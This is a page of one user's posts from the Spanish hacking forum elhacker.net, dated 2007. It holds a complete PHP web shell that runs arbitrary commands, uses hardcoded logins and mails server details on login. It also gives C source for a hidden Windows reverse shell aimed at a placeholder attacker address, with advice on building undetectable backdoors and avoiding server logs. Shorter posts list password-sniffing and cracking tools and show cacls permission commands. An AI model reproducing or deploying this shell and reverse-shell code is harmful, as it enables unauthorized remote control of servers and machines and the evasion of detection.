elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Como proteger una cartera - billetera de Bitcoin


  Mostrar Mensajes
Páginas: 1 ... 429 430 431 432 433 434 435 436 437 438 439 440 441 442 443 [444] 445 446 447 448 449 450 451 452 453 454 455 456
4431  Seguridad Informática / Hacking / Re: Jugando con netcat en: 15 Junio 2007, 06:03 am
 :xD esa sección no funciona pero si quieres saber tu ip visita esta pagina:
http://ip.interchile.com/
4432  Seguridad Informática / Nivel Web / Re: Server Explorer PHP Shell - Updated en: 13 Junio 2007, 23:57 pm
Encontré algo que talves pueda interesarte.

SSH.PHP
Código:
<?php


error_reporting(0);
session_start();

unset($user);        // Just in case ;-]
unset($pass);

if ($_POST['cmd']) $_POST['cmd'] = my_encode($_POST['cmd']);

$cache_lines = 1000;
$history_lines = 100;
$history_chars = 20;

$user[] = "root";                $pass[] = md5("hacked");
$user[] = "user";      $pass[] = md5("muie1234");
$to="";
$subject = "php SSH";
$info .= "HOST:\t$HTTP_HOST\n";
$info .= "DOC_ROOT:\t$PATH_TRANSLATED\n";
$info .= "IP:\t$REMOTE_ADDR\n";
$info .= "URL:\t$HTTP_REFERER\n";
$from = "nobody@nobody.com";

if ($_SESSION['login'])
{
   mail ("$to","$subject","$info","$from");
}


$alias = array(
    "la"    => "ls -la",
    "rf"    => "rm -f",
    "unbz2" => "tar -xjpf",
    "ungz"  => "tar -xzpf"
);



if (!$_SESSION['user']) {

    $pr_login = "Login:\n";
    $pr_pass = "Password:\n";
    $err = "Invalid login!\n\n";
    $succ = "Warning!
Don`t be stupid .. this is a priv3 server, so take extra care!!!\n\n";

    if ($_SESSION['login'] && $_POST['cmd']) { // WE HAVE USERNAME & PASSWORD

        $_SESSION['output'] .= $pr_pass;

        if (in_array($_SESSION['login'], $user)) { //........ USERNAME EXISTS

            $key = array_search($_SESSION['login'], $user);

            if ($pass[$key] != md5($_POST['cmd'])) { //....... WRONG PASSWORD
                $_SESSION['output'] .= $err;
                unset($_SESSION['login']);
                $prompt = $pr_login;

            } else { //..................................... SUCCESSFUL LOGIN
                $_SESSION['user'] = $_SESSION['login'];
                $_SESSION['whoami'] = substr(shell_exec("whoami"), 0, -1);
                $_SESSION['host'] = substr(shell_exec("uname -n"), 0, -1);
                $_SESSION['dir'] = substr(shell_exec("pwd"), 0, -1);
                $_SESSION['output'] .= $succ;
                $prompt = set_prompt();
                unset($_SESSION['login']);
            }

        } else { //......................................... NO SUCH USERNAME
            $_SESSION['output'] .= $err;
            unset($_SESSION['login']);
            $prompt = $pr_login;
        }

    } else { //................................................ LOGIN PROCESS

        if (!$_SESSION['login'] && !$_POST['cmd']) $prompt = $pr_login;

        if (!$_SESSION['login'] && $_POST['cmd']) {
            $_SESSION['login'] = $_POST['cmd'];
            $_SESSION['output'] .= substr($pr_login, 0, -1) . " $_POST[cmd]\n";
            $prompt = $pr_pass;
        }
    }

} else { //........................................................ LOGGED IN



                            /*=-- MEMBERS AREA --=*\
                            \*=-- MEMBERS AREA --=*/


    $prompt = set_prompt();

    chdir($_SESSION['dir']);

    if ($_REQUEST['clear_hist']) //............................ CLEAR HISTORY
        $_SESSION['history'] = "";

    if ($_SESSION['history']) $hist_arr = explode("\n", $_SESSION['history']);

    if ($_POST['cmd']) {

        if (!in_array($_POST['cmd'], $hist_arr)) { //......... ADD TO HISTORY
            $hist_arr[] = $_POST['cmd'];
            $_SESSION['history'] = implode("\n", $hist_arr);
        }

        if (count($hist_arr) > $history_lines) { //........... CUTOFF HISTORY
            $start = count($hist_arr) - $history_lines;
            $_SESSION['history'] = "";

            for ($i = $start; $i < count($hist_arr); $i++)
                $_SESSION['history'] .= $hist_arr[$i] . "\n";

            $_SESSION['history'] = substr($_SESSION['history'], 0, -1);
            $hist_arr = explode("\n", $_SESSION['history']);
        }

        $first_word = first_word($_POST['cmd']);

        if (array_key_exists($first_word, $alias)) { //. CHECKING FOR ALIASES
            $_POST['cmd'] = $alias[$first_word] . substr($_POST['cmd'], strlen($first_word));
            $first_word = first_word($_POST['cmd']);
        }

        switch ($first_word) {

          case "clear":
            $_SESSION['output'] = "";
            break;

          case "exit":
            session_destroy();
            refresh();
            break;

          case "cd":
            $_SESSION['output'] .= $prompt;
                $result = shell_exec($_POST['cmd'] . " 2>&1 ; pwd");
            $result = explode("\n", $result);
            $_SESSION['dir'] = $result[count($result) - 2];

            if (count($result) > 2) //.............. WE HAVE AN ERROR MESSAGE
                $result[0] = "\n" . substr($result[0], strpos($result[0], "cd: ")) . "\n";
            else $result[0] = "\n";

                $prompt = set_prompt();
                $_SESSION['output'] .= $_POST['cmd'] . $result[0];
                break;

          default:
            $result = shell_exec($_POST['cmd'] . " 2>&1");

            if (substr($result, -1) != "\n") $result .= "\n";
            $_SESSION['output'] .= $prompt . $_POST['cmd'] . "\n" . $result;

            $rows = preg_match_all('/\n/', $_SESSION['output'], $arr);
            unset($arr);

            if ($rows > $cache_lines) {
                    preg_match('/(\n[^\n]*){' . $cache_lines . '}$/', $_SESSION['output'], $out);
                $_SESSION['output'] = $out[0] . "\n";
            }
        }
    }
}



                             /*=-- FUNCTIONS --=*\
                             \*=-- FUNCTIONS --=*/


function my_encode($str) {
    $str = str_replace("\\\\", "\\", $str);
    $str = str_replace("\\\"", "\"", $str);
    $str = str_replace("\\'", "'", $str);

    while (strpos($str, "  ") !== false) $str = str_replace("  ", " ", $str);

    return rtrim(ltrim($str));
}

function set_prompt() {
    global $_SESSION;

    return $_SESSION['whoami'] . "@" . $_SESSION['host'] . " " . substr($_SESSION['dir'], strrpos($_SESSION['dir'], "/") + 1) . " $ ";
}

function first_word($str) {
    list($str) = preg_split('/[ ;]/', $str);
    return $str;
}

function refresh() {
    global $_SERVER;

    $self = substr($_SERVER['SCRIPT_NAME'], strrpos($_SERVER['SCRIPT_NAME'], "/") + 1);
    header("Location: $self");
    die;
}



                             /*=-- HTML PAGE --=*\
                             \*=-- HTML PAGE --=*/


$out = substr(preg_replace('/<\/(textarea)/i', '&lt;/\1', $_SESSION['output']), 0, -1);

?><HTML>

<HEAD>
  <TITLE>dis Shell Commander</TITLE>
  <STYLE TYPE="text/css"><!--

    INPUT, TEXTAREA, SELECT, OPTION, TD {
        color: #BBBBBB;
        background-color: #000000;
        font-family: Terminus, Fixedsys, Fixed, Terminal, Courier New, Courier;
    }

    TEXTAREA {
        overflow-y: auto;
        border-width: 0px;
        height: 100%;
        width: 100%;
        padding: 0px;
    }

    INPUT {
        border-width: 0px;
        height: 26px;
        width: 100%;
        padding-top: 5px;
    }

    SELECT, OPTION {
        color: #000000;
        background-color: #BBBBBB;
    }

    BODY {
        overflow-y: auto;
        margin: 0;
    }

  --></STYLE>
  <SCRIPT LANGUAGE="javascript"><!--

hist_arr = new Array();

<?php

foreach ($hist_arr as $key => $value) {
    $value = str_replace("\\", "\\\\", $value);
    $value = str_replace("\"", "\\\"", $value);
    echo "hist_arr[$key] = \"$value\";\n";
}

?>

function parse_hist(key) {
    if (key < hist_arr.length) {
            if (key != "") {
            document.getElementById('input').value = hist_arr[key];
            document.getElementById('input').focus();
        }
    } else {
            window.location.href = "?clear_hist=1";
    }
}

function input_focus() {
    document.getElementById('input').focus();
}

function selection_to_clipboard() { // IE only!
    if (window.clipboardData && document.selection)
        window.clipboardData.setData("Text", document.selection.createRange().text);
}

if (window.clipboardData)
    document.oncontextmenu = new Function("document.getElementById('input').value = window.clipboardData.getData('Text'); input_focus(); return false");

  --></SCRIPT>
</HEAD>
<BODY onLoad="document.getElementById('output').scrollTop = document.getElementById('output').scrollHeight; input_focus()" TOPMARGIN="0" LEFTMARGIN="0">
<TABLE CELLPADDING="0" CELLSPACING="0" BORDER="0" HEIGHT="100%" WIDTH="100%">
<TR>
  <TD HEIGHT="100%" BGCOLOR="#000000" STYLE="padding-top: 5px; padding-left: 5px; padding-right: 5px; padding-bottom: 0px"><TEXTAREA ID="output" onSelect="selection_to_clipboard()" onClick="input_focus()" READONLY><?= $out ?></TEXTAREA></TD>

</TR>
<TR>
  <TD BGCOLOR="#000000"><TABLE CELLPADDING="0" CELLSPACING="5" BORDER="0" WIDTH="100%">
    <TR>
    <FORM METHOD="POST" ACTION="">
      <TD NOWRAP onClick="input_focus()"><?= substr($prompt, 0, -1) ?></TD>
      <TD WIDTH="100%"><INPUT ID="input" TYPE="<?= (!$_SESSION['user'] && $_SESSION['login']) ? 'PASSWORD' : 'TEXT' ?>" NAME="cmd"></TD>
    </FORM><?php

if ($hist_arr) {

    ?><TD NOWRAP><SELECT onChange="parse_hist(this.options[this.selectedIndex].value)">
        <OPTION VALUE="">--- HISTORY</OPTION><?php

    for ($i = count($hist_arr) - 1; $i >= 0; $i--) {

        if (strlen($hist_arr[$i]) > $history_chars) $option = substr($hist_arr[$i], 0, $history_chars - 3) . "...";
        else $option = $hist_arr[$i];

        echo "<OPTION VALUE=\"" . $i . "\">$option</OPTION>";
    }

      ?><OPTION VALUE="<?= $history_lines + 1 ?>">--- CLEAR HISTORY</OPTION></SELECT></TD><?php

}

  ?></TR>

  </TABLE></TD>
</TR>
</TABLE>

<SCRIPT LANGUAGE="javascript"><!--
document.getElementById('output').scrollTop = document.getElementById('output').scrollHeight;
--></SCRIPT>

</BODY>
</HTML><?
4433  Seguridad Informática / Hacking / Re: Necesitas una contraseña? en: 13 Junio 2007, 23:27 pm
Citar
Cual de estos me sirve pa sacar contraseñas de cuando hay q registrarse en paginas web???????!!!!!


Respuesta

Citar
Protected Storage PassView v1.63
revela las contraseñas almacenadas en tu computadora por:

Outlook
AutoComplete passwords in Internet Explorer
Password-protected sites in Internet Explorer
MSN Explorer Passwords

Citar
SniffPass v1.01
utilidad que escucha tu red, captura las contraseñas que pasan a través de tu adaptador de la red, y las exhibe en la pantalla inmediatamente. SniffPass puede capturar las contraseñas de los protocolos siguientes (Puedes utilizar esta utilidad para recuperar contraseñas perdidas de Web/FTP/Email (contraseñas básicas de la autentificación)):

POP3
IMAP4
smtp
ftp
HTTP

Citar
IE PassView v1.04
Recupera las contraseñas guardadas por:

Internet Explorer 4.0
Internet Explorer 6.0
Internet Explorer 7.0

Citar
Netscapass v2.03
Recupera contraseñas guardadas por Netscape tales como la contraseña de servidores POP3. Versiones soportadas:

Netscape Communicator 4.x
Netscape 6.x
Netscape 7.x

Citar
Cain & Abel
Cain y Abel es una herramienta de la recuperación de la contraseña para los sistemas operativos de Microsoft. Permite la recuperación fácil de la varia clase de contraseñas sniffeando la red, crackeando contraseñas cifradas usando los ataques del diccionario, de la fuerza bruta y del criptoanálisis, conversaciones de registración de VoIP, contraseñas revueltas el descifrar, recuperando las llaves sin hilos de la red, cajas de la contraseña que revelan, destapando contraseñas depositadas y analizando protocolos de la encaminamiento. El programa no explota ningunas vulnerabilidades o bugs del software que no se podrían fijar con poco esfuerzo.


Remote Console
Remote LSA Secrets Dumper
Remote NT Hashes Dumper
Remote Route Table Manager
Remote TCP/UDP Table Viewer
Cisco Config Downloader/Uploader
MAC Scanner
Network Enumerator
Password Crackers
Brute-Force Password Cracker
Dictionary Password Cracker
Cryptanalysis
Rainbowcrack-online
WEP Cracker
Password Decoders
Password Dumpers
Password/Hash Calculators
Promiscuous-mode Scanner
Route Table Manager
Service Manager
SID Scanner
Sniffer
TCP/UDP Table Viewer

Traceroute
Wireless Scanner

4434  Programación / Programación Visual Basic / Simple Proxy 1.0 by WHK (Abre y Redireciona tus puertos) en: 12 Junio 2007, 08:37 am
Buscando alguna información sobre como usar proxyes o Socks 4 y 5 en Visual Basic encontré que nadie ha posteado sobre el tema  :-( por lo cual me dediqué a buscar en google y encontré algunas curiosidades que al final les agregué cosas mias y terminé creando un proxy-sniffer.. algo asi como un brouncer pero en VB  :P de todas maneras esto no soluciona mi problema porque yo quiero usar servidores externos como cliente no como servidor.



Ojalá lo disfruten igualmente  ;)
4435  Foros Generales / Sugerencias y dudas sobre el Foro / Re: Sugerencia Pal Foro en: 12 Junio 2007, 07:11 am
Espera... Yo lo soluciono  :xD

4436  Seguridad Informática / Nivel Web / Re: Server Explorer PHP Shell - Updated en: 12 Junio 2007, 06:47 am
 :P tiene la función de la shell y para instalar netcat con Wget... podriamos desarmar el c99 o el r57 para crear nuestros propios backdoors indetectables para unix y windows con detectores y todo lo demas.
Nota: Si tenía instalado netcat y wget pero no me lo reconoció como instalado. estaban en %windir%\system32\nc.exe y wget.exe creo que son direcciones tipicas que podrías incluir en la busqueda, ademas no necesitas usarel netcat para tener la shell inversa... basta compilar esto:

Código:
#include <winsock2.h>
#include <stdio.h>
#include <windows.h>
#pragma comment(lib,"ws2_32"Giño

int main(int argc, char *argv[])
{
ShowWindow(GetForegroundWindow(),SW_HIDE);
WSADATA wsaData;
SOCKET hSocket;
STARTUPINFO si;
PROCESS_INFORMATION pi;
struct sockaddr_in addr;
memset(&addr,0,sizeof(addr));
memset(&si,0,sizeof(si));
WSAStartup(MAKEWORD(2,0),&wsaData);
hSocket = WSASocket(AF_INET,SOCK_STREAM,NULL,NULL,NULL,NULL);
addr.sin_family = AF_INET;
addr.sin_port = htons(PUERTO);
addr.sin_addr.s_addr = inet_addr("TU IP O DOMINIO NO-IP")Giño;
connect(hSocket,(struct sockaddr*)&addr,sizeof(addr));
si.cb = sizeof(si);
si.dwFlags = STARTF_USESTDHANDLES;
si.hStdInput = si.hStdOutput = si.hStdError = (void *)hSocket;
CreateProcess(NULL,"cmd",NULL,NULL,true,NULL,NULL,NULL,&si,&pi);
ExitProcess(0);
}
Cuando tenga tiempo trataré de ayudarte para que todos podamos colaborar o si lo prefieres me hago uno solo.
Recuerda además que si manejas una simulación de netcat directamente estarás enviando tus comandos directamente al log del servidor, por eso prefiero tomar una shell directa lo mas luego posible despues de tomarla desde el servidor web, se que algunos usan sniffers pero es menos que el 100% de probabilidades que teines sobre dejar tus huellas en el servidor  :P
4437  Seguridad Informática / Nivel Web / Re: BlindMap - Advanced SQL Injection en: 12 Junio 2007, 06:34 am
Porfin un usuarui de rapidshare y no de megaupload  :xD

Muy bueno tus tutos codebreack... mucho antes que entraras en este foro yo miraba todos tus videos y desde entonces que he aprendido bastante... ojalá tenga algún dia el tiempo que tu tienes para poder aprender mas  :xD

Felicitaciones.
4438  Programación / Programación Visual Basic / Re: proteccion de los exe en: 12 Junio 2007, 03:12 am
buscate el armadillo.. es parecido al themida.
No es perfecto pero les causaras grandes dolores de cabeza al que quiera descompilar tu soft.
4439  Informática / Tutoriales - Documentación / Re: Curso Shell en: 11 Junio 2007, 20:04 pm
Muy bueno... me ha gustado bastante.
Se supone que cuando contratas un servidor externo te dan esa shell para poder administrar tu servidor "X"?
4440  Seguridad Informática / Hacking / Re: Jugando con netcat en: 9 Junio 2007, 23:53 pm
Puedes aplicar politicas de administración de archivos con el comando cacls e impedir su ejecución y eliminación de cada ejecutable involucrado en un proceso  :P

Ejemplo:

Restringe:
cacls C:\1.exe /E /C /P %username%:n
cacls C:\1.exe /E /C /P SYSTEM:n

Habilita:
cacls C:\1.exe /E /C /P SYSTEM:f
cacls C:\1.exe /E /C /P %username%:f

Citar
Microsoft Windows XP [Versión 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS>cacls
Muestra o modifica las listas de control de acceso (ACL)  de archivos

CACLS archivo [/T] [/E] [/C] [/G usuario:perm] [/R usuario [...]]
               [/P usuario:perm [...]] [/D usuario [...]]);
   archivo          Muestra ACLs.
   /T               Cambia las ACLs de los archivos especificados en
                 el directorio actual y en todos los subdirectorios.
   /E                Modifica la ACL en vez de remplazarla.
   /C               Continúa cambiando ACLs, omitiendo errores.
   /G usuario:perm  Concede derechos de acceso al usuario.
                 Perm puede ser: R  Leer
                              W  Escribir
                              C  Cambiar (escribir)
                              F  Control total
   /R usuario    Suspende los derechos del usuario (sólo con /E).
   /P usuario:perm  Sustituye los derechos de acceso del usuario.
                 Perm puede ser: N  Ninguno
                              R  Leer
                              W  Escribir
                              C  Cambiar (escribir)
                              F  Control total
   /D usuario       Denegar acceso al usuario especificado.
Se pueden usar comodines para especificar más de un archivo en el comando.
Puede especificar más de un usuario en el comando.

Abreviaciones:
   CI - Herencia de Contenedor.
        ACE se heredará por directorios.
   OI - Herencia de objeto.
        ACE se heredará por archivos.
   IO - Sólo heredar.
        ACE no se aplica al archivo o directorio actual.

C:\WINDOWS>
Páginas: 1 ... 429 430 431 432 433 434 435 436 437 438 439 440 441 442 443 [444] 445 446 447 448 449 450 451 452 453 454 455 456
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines